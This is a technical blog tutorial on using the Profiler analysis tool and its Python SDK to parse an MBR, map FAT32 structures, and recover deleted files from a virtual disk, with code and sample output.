  • udf – imported from FreeBSD

Copy the files to your user headers directory (e.g. “AppData\Roaming\CProfiler\headers”). It’s better to not put them in a sub-directory. Please note that apart from the FAT structures, none of the others have been tried out.

Note: Headers created from Linux sources contain many additional structures, this is due to the includes in the parsed source code. This is a bit ugly: in the future it would be a good idea to add an option to import only structures belonging to files in a certain path hierarchy and those referenced by them.

Since this post is about FAT, we’ll see how to import the structures for this particular file system. But the same steps apply for other file systems as well and not only for them. If you’ve never imported structures before, you might want to take a look at this previous post about dissecting an ELF and read the documentation about C++ types.

We open the Header Manager and configure some basic options like ‘OS’, ‘Language’ and ‘Standard’. In this particular case I imported the structures from FreeBSD, so I just set ‘freebsd’, ‘c’ and ‘c11’. Then we need to add the header paths, which in my case were the following:

C:/Temp/freebsd-master
C:/Temp/freebsd-master/include
C:/Temp/freebsd-master/sys
C:/Temp/freebsd-master/sys/x86
C:/Temp/freebsd-master/sys/i386/include
C:/Temp/freebsd-master/sys/i386

Then in the import edit we insert the following code:

HEADER_START("fat");

#include 
#include 
#include 
#include 
#include 

Now we can click on ‘Import’.

Import FAT structures

That’s it! We now have all the FAT structures we need in the ‘fat’ header file.

It should also be mentioned that I modified some fields of the direntry structure from the Header Manager, because they were declared as byte arrays, but should actually be shown as short and int values.

Parse the Master Boot Record

Before going on with the FAT analysis, we need to briefly talk about the MBR. FAT partitions are usually found in a larger container, like a partitioned device.

To perform my tests I created a virtual hard-disk in Windows 7 and formatted it with FAT32.

VHD MBR

As you might be able to spot, the VHD file begins with a MBR. In order to locate the partitions it is necessary to parse the MBR first. The format of the MBR is very simple and you can look it up on Wikipedia. In this case we’re only interested in the start and size of each partition.

Profiler doesn’t yet support the MBR format, although it might be added in the future. In any case, it’s easy to add the missing feature: I wrote a small hook which parses the MBR and adds the partitions as embedded objects.

Here’s the cfg data:

[GenericMBR]
label = Generic MBR Partitions
file = generic_mbr.py
scanning = scanning

And here’s the Python script:

def scanning(sp, ud):
    # make sure we're at the first level and that the format is unknown
    if sp.scanNesting() != 0 or sp.getObjectFormat() != "":
        return
    # check boot signature
    obj = sp.getObject()
    bsign = obj.Read(0x1FE, 2)
    if len(bsign) != 2 or bsign[0] != 0x55 or bsign[1] != 0xAA:
        return
    # add partitions
    for x in range(4):
        entryoffs = 0x1BE + (x * 0x10)
        offs, ret = obj.ReadUInt32(entryoffs + 8)
        size, ret = obj.ReadUInt32(entryoffs + 12)
        if offs != 0 and size != 0:
            sp.addEmbeddedObject(offs * 512, size * 512, "?", "Partition #" + str(x + 1))

And now we can inspect the partitions directly (do not forget to enable the hook from the extensions).

VHD Partitions

Easy.

Analyze raw file system data

The basics of the FAT format are quite simple to describe. The data begins with the boot sector header and some additional fields for FAT32 over FAT16 and for FAT16 over FAT12. We’re only interested in FAT32, so to simplify the description I will only describe this particular variant. The boot sector header specifies essential information such as sector size, sectors in clusters, number of FATs, size of FAT etc. It also specifies the number of reserved sectors. These reserved sectors start with the boot sector and where they end the FAT begins.

The ‘FAT’ in this case is not just the name of the file system, but the File Allocation Table itself. The size of the FAT, as already mentioned, is specified in the boot sector header. Usually, for data-loss prevention, more than one FAT is present. Normally there are two FATs: the number is specified in the boot sector header. The backup FAT follows the first one and has the same size. The data after the FAT(s) and right until the end of the partition includes directory entries and file data. The cluster right after the FAT(s) usually starts with the Root Directory entry, but even this is specified in the boot sector header.

The FAT itself is just an array of 32-bit indexes pointing to clusters. The first 2 indexes are special: they specify the range of EOF values for indexes. It works like this: a directory entry for a file (directories and files share the same structure) specifies the first cluster of said file, if the file is bigger than one cluster, the FAT is looked up at the index representing the current cluster, this index specifies the next cluster belonging to the file. If the index contains one of the values in the EOF range, the file has no more clusters or perhaps contains a damaged cluster (0xFFFFFFF7). Indexes with a value of zero are marked as free. Cluster index are 2-based: cluster 2 is actually cluster 0 in the data region. This means that if the Root Directory is specified to be located at cluster 2, it is located right after the FATs.

Hence, the size of the FAT depends on the size of the partition, and it must be big enough to accommodate an array large enough to represent every cluster in the data area.

So, let’s perform our raw analysis by adding the boot sector header and the additional FAT32 fields:

Add struct

Note: When adding a structure make sure that it’s packed to 1, otherwise field alignment will be wrong.

Boot sector

Then we highlight the FATs.

FATs

And the Root Directory entry.

Root Directory

This last step was just for demonstration, as we’re currently not interested in the Root Directory. Anyway, now we have a basic layout of the FAT to inspect and this is useful.

Let’s now make our analysis applicable to future cases.

Automatically create an analysis layout

Manually analyzing a file is very useful and it’s the first step everyone of us has to do when studying an unfamiliar file format. However, chances are that we have to analyze files with the same format in the future.

That’s why we could write a small Python script to create the analysis layout for us. We’ve already seen how to do this in the post about dissecting an ELF.

Here’s the code:

from Pro.Core import *
from Pro.UI import *
 
def buildFATLayout(obj, l):
    hname = "fat"
    hdr = CFFHeader()
    if hdr.LoadFromFile(hname) == False:
        return
    sopts = CFFSO_VC | CFFSO_Pack1
    d = LayoutData()
    d.setTypeOptions(sopts)
 
    # add boot sector header and FAT32 fields
    bhdr = obj.MakeStruct(hdr, "bootsector", 0, sopts)
    d.setColor(ntRgba(0, 170, 255, 70))
    d.setStruct(hname, "bootsector")
    l.add(0, bhdr.Size(), d)
    bexhdr = obj.MakeStruct(hdr, "bpb710", 0xB, sopts)
    d.setStruct(hname, "bpb710")
    l.add(0xB, bexhdr.Size(), d)

    # get FAT32 info
    bytes_per_sec = bexhdr.Num("bpbBytesPerSec")
    sec_per_clust = bexhdr.Num("bpbSecPerClust")
    res_sect = bexhdr.Num("bpbResSectors")
    nfats = bexhdr.Num("bpbFATs")
    fat_sects = bexhdr.Num("bpbBigFATsecs")
    root_clust = bexhdr.Num("bpbRootClust")
    bytes_per_clust = bytes_per_sec * sec_per_clust

    # add FAT intervals, highlight copies with a different color
    d2 = LayoutData()
    d2.setColor(ntRgba(255, 255, 127, 70))
    fat_start = res_sect * bytes_per_sec
    fat_size = fat_sects * bytes_per_sec
    d2.setDescription("FAT1")
    l.add(fat_start, fat_size, d2)
    # add copies
    d2.setColor(ntRgba(255, 170, 127, 70))
    for x in range(nfats - 1):
        fat_start = fat_start + fat_size
        d2.setDescription("FAT" + str(x + 2))
        l.add(fat_start, fat_size, d2)
    fat_end = fat_start + fat_size

    # add root directory
    rootdir_offs = (root_clust - 2) + fat_end
    rootdir = obj.MakeStruct(hdr, "direntry", rootdir_offs, sopts)
    d.setStruct(hname, "direntry")
    d.setDescription("Root Directory")
    l.add(rootdir_offs, rootdir.Size(), d)
    
 
hv = proContext().getCurrentView()
if hv.isValid() and hv.type() == ProView.Type_Hex:
    c = hv.getData()
    obj = CFFObject()
    obj.Load(c)
    lname = "FAT_ANALYSIS" # we could make the name unique
    l = proContext().getLayout(lname) 
    buildFATLayout(obj, l)
    # apply the layout to the current hex view
    hv.setLayoutName(lname)

We can create an action with this code or just run it on the fly with Ctrl+Alt+R.

Recover deleted files

Now that we know where the FAT is located and where the data region begins, we can try to recover deleted files. There’s more than one possible approach to this task (more on that later). What I chose to do is to scan the entire data region for file directory entries and to perform integrity checks on them, in order to establish that they really are what they seem to be.

Let’s take a look at the original direntry structure:

struct direntry {
	u_int8_t	deName[11];	/* filename, blank filled */
#define	SLOT_EMPTY	0x00		/* slot has never been used */
#define	SLOT_E5		0x05		/* the real value is 0xe5 */
#define	SLOT_DELETED	0xe5		/* file in this slot deleted */
	u_int8_t	deAttributes;	/* file attributes */
#define	ATTR_NORMAL	0x00		/* normal file */
#define	ATTR_READONLY	0x01		/* file is readonly */
#define	ATTR_HIDDEN	0x02		/* file is hidden */
#define	ATTR_SYSTEM	0x04		/* file is a system file */
#define	ATTR_VOLUME	0x08		/* entry is a volume label */
#define	ATTR_DIRECTORY	0x10		/* entry is a directory name */
#define	ATTR_ARCHIVE	0x20		/* file is new or modified */
	u_int8_t	deLowerCase;	/* NT VFAT lower case flags */
#define	LCASE_BASE	0x08		/* filename base in lower case */
#define	LCASE_EXT	0x10		/* filename extension in lower case */
	u_int8_t	deCHundredth;	/* hundredth of seconds in CTime */
	u_int8_t	deCTime[2];	/* create time */
	u_int8_t	deCDate[2];	/* create date */
	u_int8_t	deADate[2];	/* access date */
	u_int8_t	deHighClust[2];	/* high bytes of cluster number */
	u_int8_t	deMTime[2];	/* last update time */
	u_int8_t	deMDate[2];	/* last update date */
	u_int8_t	deStartCluster[2]; /* starting cluster of file */
	u_int8_t	deFileSize[4];	/* size of file in bytes */
};

Every directory entry has to be aligned to 0x20. If the file has been deleted the first byte of the deName field will be set to SLOT_DELETED (0xE5). That’s the first thing to check. The directory name should also not contain certain values like 0x00. According to Wikipedia, the following values aren’t allowed:

  • ” * / : < > ? \ |
    Windows/MS-DOS has no shell escape character
  • + , . ; = [ ]
    They are allowed in long file names only.
  • Lower case letters a–z
    Stored as A–Z. Allowed in long file names.
  • Control characters 0–31
  • Value 127 (DEL)

We can use these rules to validate the short file name. Moreover, certain directory entries are used only to store long file names:

/*
 * Structure of a Win95 long name directory entry
 */
struct winentry {
	u_int8_t	weCnt;
#define	WIN_LAST	0x40
#define	WIN_CNT		0x3f
	u_int8_t	wePart1[10];
	u_int8_t	weAttributes;
#define	ATTR_WIN95	0x0f
	u_int8_t	weReserved1;
	u_int8_t	weChksum;
	u_int8_t	wePart2[12];
	u_int16_t	weReserved2;
	u_int8_t	wePart3[4];
};

We can exclude these entries by making sure that the deAttributes/weAttributes isn’t ATTR_WIN95 (0xF).

Once we have confirmed the integrity of the file name and made sure it’s not a long file name entry, we can validate the deAttributes. It should definitely not contain the flags ATTR_DIRECTORY (0x10) and ATTR_VOLUME (8).

Finally we can make sure that deFileSize isn’t 0 and that deHighClust combined with deStartCluster contains a valid cluster index.

It’s easier to write the code than to talk about it. Here’s a small snippet which looks for deleted files and prints them to the output view:

from Pro.Core import *

class FATData(object):
    pass

def setupFATData(obj):
    hdr = CFFHeader()
    if hdr.LoadFromFile("fat") == False:
        return None
    bexhdr = obj.MakeStruct(hdr, "bpb710", 0xB, CFFSO_VC | CFFSO_Pack1)
    fi = FATData()
    fi.obj = obj
    fi.hdr = hdr
    # get FAT32 info
    fi.bytes_per_sec = bexhdr.Num("bpbBytesPerSec")
    fi.sec_per_clust = bexhdr.Num("bpbSecPerClust")
    fi.res_sect = bexhdr.Num("bpbResSectors")
    fi.nfats = bexhdr.Num("bpbFATs")
    fi.fat_sects = bexhdr.Num("bpbBigFATsecs")
    fi.root_clust = bexhdr.Num("bpbRootClust")
    fi.bytes_per_clust = fi.bytes_per_sec * fi.sec_per_clust
    fi.fat_offs = fi.res_sect * fi.bytes_per_sec
    fi.fat_size = fi.fat_sects * fi.bytes_per_sec
    fi.data_offs = fi.fat_offs + (fi.fat_size * fi.nfats)
    fi.data_size = obj.GetSize() - fi.data_offs
    fi.data_clusters = fi.data_size // fi.bytes_per_clust
    return fi

invalid_short_name_chars = [
    127,
    ord('"'), ord("*"), ord("/"), ord(":"), ord("<"), ord(">"), ord("?"), ord("\\"), ord("|"),
    ord("+"), ord(","), ord("."), ord(";"), ord("="), ord("["), ord("]")
    ]
def validateShortName(name):
    n = len(name)
    for x in range(n):
        c = name[x]
        if (c >= 0 and c <= 31) or (c >= 0x61 and c <= 0x7A) or c in invalid_short_name_chars:
            return False
    return True

# validate short name
# validate attributes: avoid long file name entries, directories and volumes
# validate file size
# validate cluster index
def validateFileDirectoryEntry(fi, de):
    return validateShortName(de.name) and de.attr != 0xF and (de.attr & 0x18) == 0 and \
            de.file_size != 0 and de.clust_idx >= 2 and de.clust_idx - 2 < fi.data_clusters

class DirEntryData(object):
    pass

def getDirEntryData(b):
    # reads after the first byte
    de = DirEntryData()
    de.name = b.read(10)
    de.attr = b.u8()     
    b.read(8) # skip some fields
    de.high_clust = b.u16()
    b.u32() # skip two fields
    de.clust_idx = (de.high_clust << 16) | b.u16()
    de.file_size = b.u32()
    return de

def findDeletedFiles(fi):
    # scan the data region one cluster at a time using a buffer
    # this is more efficient than using an array of CFFStructs
    dir_entries = fi.data_size // 0x20
    b = fi.obj.ToBuffer(fi.data_offs)
    b.setBufferSize(0xF000)
    for x in range(dir_entries):
        try:
            unaligned = b.getOffset() % 0x20
            if unaligned != 0:
                b.read(0x20 - unaligned)
            # has it been deleted?
            if b.u8() != 0xE5:
                continue
            # validate fields
            de = getDirEntryData(b)
            if validateFileDirectoryEntry(fi, de) == False:
                continue
            # we have found a deleted file entry!
            name = de.name.decode("ascii", "replace")
            print(name + " - offset: " + hex(b.getOffset() - 0x20))
        except:
            # an exception occurred, debug info
            print("exception at offset: " + hex(b.getOffset() - 0x20))
            raise

obj = proCoreContext().currentScanProvider().getObject()
fi = setupFATData(obj)
if fi != None:
    findDeletedFiles(fi)

This script is to be run on the fly with Ctrl+Alt+R. It's not complete, otherwise I would have added a wait box, since like it's now the script just blocks the UI for the entire execution. We'll see later how to put everything together in a meaningful way.

The output of the script is the following:

���������� - offset: 0xd6a0160
���������� - offset: 0x181c07a0
���������� - offset: 0x1d7ee980
&�&�&�&�&� - offset: 0x1e7dee20
'�'�'�'�'� - offset: 0x1f3b49a0
'�'�'�'�'� - offset: 0x1f5979a0
'�'�'�'�'� - offset: 0x1f9f89a0
'�'�'�'�'� - offset: 0x1fbdb9a0
$�$�$�$�$� - offset: 0x1fdcad40
&�&�&�&�&� - offset: 0x1fdcc520
'�'�'�'�'� - offset: 0x2020b9a0
'�'�'�'�'� - offset: 0x205a99a0
'�'�'�'�'� - offset: 0x20b0fe80
'�'�'�'�'� - offset: 0x20b0fec0
'�'�'�'�'� - offset: 0x20e08e80
'�'�'�'�'� - offset: 0x20e08ec0
'�'�'�'�'� - offset: 0x21101e80
'�'�'�'�'� - offset: 0x21101ec0
'�'�'�'�'� - offset: 0x213fae80
'�'�'�'�'� - offset: 0x213faec0
 � � � � � - offset: 0x21d81fc0
#�#�#�#�#� - offset: 0x221b96a0
'�'�'�'�'� - offset: 0x226279a0
 � � � � � - offset: 0x2298efc0
'�'�'�'�'� - offset: 0x22e1ee80
'�'�'�'�'� - offset: 0x22e1eec0
'�'�'�'�'� - offset: 0x232c69a0
'�'�'�'�'� - offset: 0x234a99a0
'�'�'�'�'� - offset: 0x2368c9a0
'�'�'�'�'� - offset: 0x23a37e80
'�'�'�'�'� - offset: 0x23a37ec0
'�'�'�'�'� - offset: 0x23d30e80
'�'�'�'�'� - offset: 0x23d30ec0
'�'�'�'�'� - offset: 0x24029e80
'�'�'�'�'� - offset: 0x24029ec0
'�'�'�'�'� - offset: 0x24322e80
'�'�'�'�'� - offset: 0x24322ec0
'�'�'�'�'� - offset: 0x2461be80
'�'�'�'�'� - offset: 0x2461bec0
'�'�'�'�'� - offset: 0x2474d9a0
 � � � � � - offset: 0x24ab4fc0
 � � � � � - offset: 0x24f01fc0
 � � � � � - offset: 0x2534efc0
���������O - offset: 0x33b4f2e0
�������@@@ - offset: 0x345c7200
OTEPAD EXE - offset: 0x130c009e0
TOSKRNLEXE - offset: 0x130c00b80
TPRINT EXE - offset: 0x130c00bc0
��S�W����� - offset: 0x1398fddc0
��S�V���YY - offset: 0x13af3ad60
��M����E�� - offset: 0x13bbec640
EGEDIT EXE - offset: 0x13ef1f1a0

We can see many false positives in the list. The results would be cleaner if we allowed only ascii characters in the name, but this wouldn't be correct, because short names do allow values above 127. We could make this an extra option, generally speaking it's probably better to have some false positives than missing valid entries. Among the false positives we can spot four real entries. What I did on the test disk was to copy many files from the System32 directory of Windows and then to delete four of them, exactly those four found by the script.

The next step is recovering the content of the deleted files. The theory here is that we retrieve the first cluster of the file from the directory entry and then use the FAT to retrieve more entries until the file size is satisfied. The cluster indexes in the FAT won't contain the next cluster value and will be set to 0. We look for adjacent 0 indexes to find free clusters which may have belonged to the file. Another approach would be to dump the entire file size starting from the first cluster, but that approach is worse, because it doesn't tolerate even a little bit of fragmentation in the FAT. Of course, heavy fragmentation drastically reduces the chances of a successful recovery.

However, there's a gotcha which I wasn't aware of and it wasn't mentioned in my references. Let's take a look at the deleted directory entry of 'notepad.exe'.

Notepad directory entry

In FAT32 the index of the first cluster is obtained by combining the high-word deHighClust with the low-word deStartCluster in order to obtain a 32-bit index.

The problem is that the high-word has been zeroed. The actual value should be 0x0013. Seems this behavior is common on Microsoft operating systems as mentioned in this thread on Forensic Focus.

This means that only files with a cluster index equal or lower than 0xFFFF will be correctly pointed at. This makes another approach for FAT32 file recovery more appealing: instead of looking for deleted directly entries, one could directly look for cluster indexes with a value of 0 in the FAT and recognize the start of a file by matching signatures. Profiler offers an API to identify file signatures (although limited to the file formats it supports), so we could easily implement this logic. Another advantage of this approach is that it doesn't require a deleted file directory entry to work, increasing the possibility to recover deleted files. However, even that approach has certain disadvantages:

  1. Files which have no signature (like text files) or are not identified won't be recovered.
  2. The name of the files won't be recovered at all, unless they contain it themselves, but that's unlikely.

Disadvantages notwithstanding I think that if one had to choose between the two approaches the second one holds higher chances of success. So why then did I opt to do otherwise? Because I thought it would be nice to recover file names, even though only partially and delve a bit more in the format of FAT32. The blunt approach could be generalized more and requires less FAT knowledge.

However, the surely best approach is to combine both systems in order to maximize chances of recovery at the cost of duplicates. But this is just a demonstration, so let's keep it relatively simple and let's go back to the problem at hand: the incomplete start cluster index.

Recovering files only from lower parts of the disk isn't really good enough. We could try to recover the high-word of the index from adjacent directory entries of existing files. For instance, let's take a look at the deleted directory entry:

Deleted entry

As you can see, the directory entry above the deleted one represents a valid file entry and contains an intact high-word we could use to repair our index. Please remember that this technique is just something I came up with and offers no guarantee whatsoever. In fact, it only works under certain conditions:

  1. The cluster containing the deleted entry must also contain a valid file directory entry.
  2. The FAT can't be heavily fragmented, otherwise the retrieved high-word might not be correct.

Still I think it's interesting and while it might not always be successful in automatic mode, it can be helpful when trying a manual recovery.

This is how the code to recover partial cluster indexes might look like:

def recoverClusterHighWord(fi, offs):
    cluster_start = offs - (offs % fi.bytes_per_clust)
    deloffs = offs - (offs % 0x20)
    nbefore = (deloffs - cluster_start) // 0x20
    nafter = (fi.bytes_per_clust - (deloffs - cluster_start)) // 0x20 - 1
    b = fi.obj.ToBuffer(deloffs + 0x20, Bufferize_BackAndForth)
    b.setBufferSize(fi.bytes_per_clust * 2)
    de_before = None
    de_after = None
    try:
        # try to find a valid entry before
        if nbefore > 0:
            for x in range(nbefore):
                b.setOffset(b.getOffset() - 0x40)
                # it can't be a deleted entry
                if b.u8() == 0xE5:
                    continue
                de = getDirEntryData(b)
                if validateFileDirectoryEntry(fi, de):
                    de_before = de
                    break
        # try to find a valid entry after
        if nafter > 0 and de_before == None:
            b.setOffset(deloffs + 0x20)
            for x in range(nafter):
                # it can't be a deleted entry
                if b.u8() == 0xE5:
                    continue
                de = getDirEntryData(b)
                if validateFileDirectoryEntry(fi, de):
                    de_after = de
                    break
    except:
        pass
    # return the high-word if any
    if de_before != None:
        return de_before.high_clust
    if de_after != None:
        return de_after.high_clust
    return 0

It tries to find a valid file directory entry before and after the deleted entry, remaining in the same cluster. Now we can write a small function to recover the file content.

# dump the content of a deleted file using the FAT
def dumpDeletedFileContent(fi, f, start_cluster, file_size):
    while file_size > 0:
        offs = clusterToOffset(fi, start_cluster)
        data = fi.obj.Read(offs, fi.bytes_per_clust)
        if file_size < fi.bytes_per_clust:
            data = data[:file_size]
        f.write(data)
        # next
        file_size = file_size - min(file_size, fi.bytes_per_clust)
        # find next cluster
        while True:
            start_cluster = start_cluster + 1
            idx_offs = start_cluster * 4 + fi.fat_offs
            idx, ok = fi.obj.ReadUInt32(idx_offs)
            if ok == False:
                return False
            if idx == 0:
                break
    return True

All the pieces are there, it's time to bring them together.

Create a recovery tool

With the recently introduced logic provider extensions, it's possible to create every kind of easy-to-use custom utility. Until now we have seen useful pieces of code, but using them as provided is neither user-friendly nor practical. Wrapping them up in a nice graphical utility is much better.

Home view

What follows is the source code or at least part of it: I have omitted those parts which haven't significantly changed. You can download the full source code from here.

Here's the cfg entry:

[FAT32Recovery]
label = FAT32 file recovery utility
descr = Recover files from a FAT32 partition or drive.
file = fat32_recovery.py
init = FAT32Recovery_init

And the Python code:

class RecoverySystem(LocalSystem):

    def __init__(self):
        LocalSystem.__init__(self)
        self.ctx = proCoreContext()
        self.partition = None
        self.current_partition = 0
        self.fi = None
        self.counter = 0

    def wasAborted(self):
        Pro.UI.proProcessEvents(1)
        return self.ctx.wasAborted()

    def nextFile(self):
        fts = FileToScan()

        if self.partition == None:
            # get next partition
            while self.current_partition < 4:
                entryoffs = 0x1BE + (self.current_partition * 0x10)
                self.current_partition = self.current_partition + 1
                offs, ret = self.disk.ReadUInt32(entryoffs + 8)
                size, ret = self.disk.ReadUInt32(entryoffs + 12)
                if offs != 0 and size != 0:
                    cpartition = self.disk.GetStream()
                    cpartition.setRange(offs * 512, size * 512)
                    part = CFFObject()
                    part.Load(cpartition)
                    self.fi = setupFATData(part)
                    if self.fi != None:
                        self.fi.system = self
                        self.partition = part
                        self.next_entry = self.fi.data_offs
                        self.fi.ascii_names_conv = self.ascii_names_conv
                        self.fi.repair_start_clusters = self.repair_start_clusters
                        self.fi.max_file_size = self.max_file_size
                        break

        if self.partition != None:
            de = findDeletedFiles(self.fi, self.next_entry)
            if de != None:
                self.next_entry = de.offs + 0x20
                fname = "%08X" % self.counter
                f = open(self.dump_path + fname, "wb")
                if f == None:
                    ctx.msgBox(MsgErr, "Couldn't open file '" + fname + "'")
                    return fts
                dumpDeletedFileContent(self.fi, f, de.clust_idx, de.file_size)
                f.close()
                self.counter = self.counter + 1
                fts.setName(fname + "\\" + de.name)
                fts.setLocalName(self.dump_path + fname)
            else:
                self.partition = None

        return fts

def recoveryOptionsCallback(pe, id, ud):
    if id == Pro.UI.ProPropertyEditor.Notification_Close:
        path = pe.getValue(0)
        if len(path) == 0 or os.path.isdir(path) == False:
            errs = NTIntList()
            errs.append(0)
            pe.setErrors(errs)
            return False
    return True

def FAT32Recovery_init():
    ctx = Pro.UI.proContext()
    file_name = ctx.getOpenFileName("Select disk...")
    if len(file_name) == 0:
        return False

    cdisk = createContainerFromFile(file_name)
    if cdisk.isNull():
        ctx.msgBox(MsgWarn, "Couldn't open disk!")
        return False

    disk = CFFObject()
    disk.Load(cdisk)
    bsign = disk.Read(0x1FE, 2)
    if len(bsign) != 2 or bsign[0] != 0x55 or bsign[1] != 0xAA:
        ctx.msgBox(MsgWarn, "Invalid MBR!")
        return False

    dlgxml = """

  
""" opts = ctx.askParams(dlgxml, "FAT32RecoveryOptions", recoveryOptionsCallback, None) if opts.isEmpty(): return False s = RecoverySystem() s.disk = disk s.dump_path = os.path.normpath(opts.value(0)) + os.sep s.ascii_names_conv = "strict" if opts.value(1) else "replace" s.repair_start_clusters = opts.value(2) if opts.value(3) != 0: s.max_file_size = opts.value(3) * 1024 * 1024 proCoreContext().setSystem(s) return True

When the tool is activated it will ask for the disk file to be selected, then it will show an options dialog.

Options

In our case we can select the option 'Ascii only names' to exclude false positives.

The options dialog asks for a directory to save the recovered files. In the future it will be possible to save volatile files in the temporary directory created for the report, but since it's not yet possible, it's the responsibility of the user to delete the recovered files if he wants to.

The end results of the recovery operation:

Results

All four deleted files have been successfully recovered.

Three executables are marked as risky because intrinsic risk is enabled and only 'ntoskrnl.exe' contains a valid digital certificate.

Conclusions

I'd like to remind you that this utility hasn't been tested on disks other than on the one I've created for the post and, as already mentioned, it doesn't even implement the best method to recover files from a FAT32, which is to use a signature based approach. It's possible that in the future we'll improve the script and include it in an update.

The purpose of this post was to show some of the many things which can be done with Profiler. I used only Profiler for the entire job: from analysis to code development (I even wrote the entire Python code with it). And finally to demonstrate how a utility with commercial value like the one presented could be written in under 300 lines of Python code (counting comments and new-lines).

The advantages of using the Profiler SDK are many. Among them:

  • It hugely simplifies the analysis of files. In fact, I used only two external Python functions: one to check the existence of a directory and one to normalize the path string.
  • It helps building a fast robust product.
  • It offers a graphical analysis experience to the user with none or little effort.
  • It gives the user the benefit of all the other features and extension offered by Profiler.

To better explain what is meant by the last point, let's take the current example. Thanks to the huge amount of formats supported by Profiler, it will be easy for the user to validate the recovered files.

Validate recovered files

In the case of Portable Executables it's extremely easy because of the presence of digital certificates, checksums and data structures. But even with other files it's easy, because Profiler may detect errors in the format or unused ranges.

I hope you enjoyed this post!

P.S. You can download the complete source code and related files from here.

References

  1. File System Forensic Analysis - Brian Carrier
  2. Understanding FAT32 Filesystems - Paul Stoffregen
  3. Official documentation - Microsoft
  4. File Allocation Table - Wikipedia
  5. Master boot record - Wikipedia